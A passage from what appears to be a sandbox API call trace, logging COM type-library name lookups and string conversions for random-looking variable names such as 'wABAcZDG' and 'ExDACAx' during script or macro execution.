wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ec6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wABAcZDG") returned 9 [0069.247] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wABAcZDG", lHashVal=0x109baf, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wABAcZDG") returned 0x109baf [0069.247] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wABAcZDG" | out: _Dst="wABAcZDG") returned 0x0 [0069.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wABAcZDG") returned 9 [0069.247] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.247] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wABAcZDG", lHashVal=0x109baf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.248] IUnknown:Release (This=0x665ba50) returned 0xd [0069.248] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.248] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wABAcZDG", lHashVal=0x109baf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.248] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.248] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.248] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wABAcZDG", lHashVal=0x109baf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.248] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.248] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.248] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wABAcZDG", lHashVal=0x109baf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.248] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ec6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wABAcZDG") returned 9 [0069.248] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wABAcZDG", lHashVal=0x109baf, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.248] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.248] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62ec6 | out: _Dst=0x67c2d40) returned 0x0 [0069.248] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wABAcZDG") returned 0x107338 [0069.248] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wABAcZDG" | out: _Dst="_B_var_wABAcZDG") returned 0x0 [0069.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wABAcZDG") returned 16 [0069.248] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.248] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wABAcZDG", lHashVal=0x107338, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.248] IUnknown:Release (This=0x665ba50) returned 0xd [0069.248] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.248] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wABAcZDG", lHashVal=0x107338, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.248] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.248] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.248] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wABAcZDG", lHashVal=0x107338, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.248] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.248] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.249] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wABAcZDG", lHashVal=0x107338, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.249] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.249] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.249] IUnknown:Release (This=0x665ba50) returned 0xd [0069.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11dbe, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_wABAcZDG") returned 16 [0069.249] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wABAcZDG", lHashVal=0x107338, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x63004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x63004100000000, pDummy=0x0) returned 0x0 [0069.249] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62ec6 | out: _Dst=0x144ec0) returned 0x0 [0069.249] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jBxxADA", lHashVal=0x10af71, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62f1e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jBxxADA") returned 8 [0069.249] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jBxxADA", lHashVal=0x10af71, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62f1e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jBxxADA") returned 8 [0069.249] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jBxxADA", lHashVal=0x10af71, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.249] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jBxxADA") returned 0x10af71 [0069.249] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="jBxxADA" | out: _Dst="jBxxADA") returned 0x0 [0069.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="jBxxADA") returned 8 [0069.249] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.249] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jBxxADA", lHashVal=0x10af71, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.249] IUnknown:Release (This=0x665ba50) returned 0xd [0069.249] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.250] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jBxxADA", lHashVal=0x10af71, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.250] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.250] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.250] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jBxxADA", lHashVal=0x10af71, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.250] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.250] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.250] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jBxxADA", lHashVal=0x10af71, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.250] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62f1e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jBxxADA") returned 8 [0069.250] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jBxxADA", lHashVal=0x10af71, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.250] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.250] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62f1e | out: _Dst=0x67c2d40) returned 0x0 [0069.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jBxxADA") returned 0x10b2f5 [0069.250] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_jBxxADA" | out: _Dst="_B_var_jBxxADA") returned 0x0 [0069.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_jBxxADA") returned 15 [0069.250] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.250] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jBxxADA", lHashVal=0x10b2f5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.250] IUnknown:Release (This=0x665ba50) returned 0xd [0069.250] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.250] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jBxxADA", lHashVal=0x10b2f5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.250] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.250] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.250] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jBxxADA", lHashVal=0x10b2f5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.250] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.250] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.250] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jBxxADA", lHashVal=0x10b2f5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.251] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.251] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.251] IUnknown:Release (This=0x665ba50) returned 0xd [0069.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11dee, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_jBxxADA") returned 15 [0069.251] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jBxxADA", lHashVal=0x10b2f5, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41007800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41007800000000, pDummy=0x0) returned 0x0 [0069.251] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62f1e | out: _Dst=0x144ec0) returned 0x0 [0069.251] ITypeComp:RemoteBind (in: This=0x665ba60, szName="RZQ4DkD", lHashVal=0x1005cb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62f46, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="RZQ4DkD") returned 8 [0069.252] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="RZQ4DkD", lHashVal=0x1005cb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62f46, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="RZQ4DkD") returned 8 [0069.252] ITypeComp:RemoteBind (in: This=0x665bd30, szName="RZQ4DkD", lHashVal=0x1005cb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.252] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RZQ4DkD") returned 0x1005cb [0069.252] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="RZQ4DkD" | out: _Dst="RZQ4DkD") returned 0x0 [0069.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="RZQ4DkD") returned 8 [0069.252] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.252] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="RZQ4DkD", lHashVal=0x1005cb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.252] IUnknown:Release (This=0x665ba50) returned 0xd [0069.252] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.252] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="RZQ4DkD", lHashVal=0x1005cb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.252] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.252] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.252] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="RZQ4DkD", lHashVal=0x1005cb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.252] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.252] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.252] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="RZQ4DkD", lHashVal=0x1005cb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.252] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62f46, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="RZQ4DkD") returned 8 [0069.252] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="RZQ4DkD", lHashVal=0x1005cb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.253] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.253] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62f46 | out: _Dst=0x67c2d40) returned 0x0 [0069.253] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_RZQ4DkD") returned 0x10094f [0069.253] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_RZQ4DkD" | out: _Dst="_B_var_RZQ4DkD") returned 0x0 [0069.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_RZQ4DkD") returned 15 [0069.253] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.253] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_RZQ4DkD", lHashVal=0x10094f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.253] IUnknown:Release (This=0x665ba50) returned 0xd [0069.253] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.253] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_RZQ4DkD", lHashVal=0x10094f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.253] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.253] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.253] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_RZQ4DkD", lHashVal=0x10094f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.253] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.253] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.253] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_RZQ4DkD", lHashVal=0x10094f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.253] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.253] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.253] IUnknown:Release (This=0x665ba50) returned 0xd [0069.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11e1e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_RZQ4DkD") returned 15 [0069.253] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_RZQ4DkD", lHashVal=0x10094f, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x44003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x44003400000000, pDummy=0x0) returned 0x0 [0069.254] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62f46 | out: _Dst=0x144ec0) returned 0x0 [0069.254] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ExDACAx", lHashVal=0x104d22, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62f6e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ExDACAx") returned 8 [0069.254] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ExDACAx", lHashVal=0x104d22, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62f6e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ExDACAx") returned 8 [0069.254] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ExDACAx", lHashVal=0x104d22, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExDACAx") returned 0x104d22 [0069.254] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="ExDACAx" | out: _Dst="ExDACAx") returned 0x0 [0069.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="ExDACAx") returned 8 [0069.254] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.254] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ExDACAx", lHashVal=0x104d22, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.254] IUnknown:Release (This=0x665ba50) returned 0xd [0069.254] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.254] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ExDACAx", lHashVal=0x104d22, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.254] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.254] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.254] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ExDACAx", lHashVal=0x104d22, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.254] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.254] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.254] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ExDACAx", lHashVal=0x104d22, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.255] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62f6e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ExDACAx") returned 8 [0069.255] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ExDACAx", lHashVal=0x104d22, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.255] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.255] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62f6e | out: _Dst=0x67c2d40) returned 0x0 [0069.255] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ExDACAx") returned 0x1050a6 [0069.255] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_ExDACAx" | out: _Dst="_B_var_ExDACAx") returned 0x0 [0069.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_ExDACAx") returned 15 [0069.255] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.255] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ExDACAx", lHashVal=0x1050a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.255] IUnknown:Release (This=0x665ba50) returned 0xd [0069.255] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.255] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ExDACAx", lHashVal=0x1050a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.255] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.255] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.255] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ExDACAx", lHashVal=0x1050a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.255] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.255] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.255] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ExDACAx", lHashVal=0x1050a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.255] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.255] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.255] IUnknown:Release (This=0x665ba50) returned 0xd 